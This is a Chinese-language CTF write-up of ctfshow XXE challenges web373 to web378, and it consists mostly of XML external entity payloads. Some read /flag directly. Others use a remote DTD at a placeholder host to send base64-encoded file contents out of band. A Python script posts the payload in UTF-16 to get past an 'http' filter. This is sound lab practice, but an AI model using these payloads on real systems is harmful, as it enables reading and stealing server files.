Web之XXE

教程

优秀！

先知

义神

练习

web373

<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE root [ <!ENTITY words SYSTEM 'file:///flag'>]>
<root>
<ctfshow>&words;</ctfshow>
</root>

web374

基本的盲打

<?xml version='1.0'?>
<!DOCTYPE root [
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=/flag">
<!ENTITY % dtd SYSTEM "http://xxx/evil.xml">
%dtd;
%send;
]>

<!ENTITY % payload "<!ENTITY % send SYSTEM 'http://xxx/?content=%file;'>"> %payload;

我一开始的想法是直接在payload里访问端口了，但不知道为什么失败了，一定要加一个send

web375

其实不写xml头也可以？

<!DOCTYPE root [
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=/flag">
<!ENTITY % dtd SYSTEM "http://xxx/evil.xml">
%dtd;
%send;
]>

web376

同上

web377

屏蔽了http

考虑用utf-16编码

import requests

payload = """
<!DOCTYPE root [
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=/flag">
<!ENTITY % dtd SYSTEM "http://xxx/evil.xml">
%dtd;
%send;
]>
"""

url = "http://22fab6fe-0959-433a-aa11-15dfd549449c.challenge.ctf.show"

res = requests.post(url,data=payload.encode("UTF-16"))

web378

<!DOCTYPE user[
<!ENTITY flag SYSTEM "file:///flag">
]>
<user>
<username>
&flag;
</username>
</user>

总结

其实还是一只半懂。。。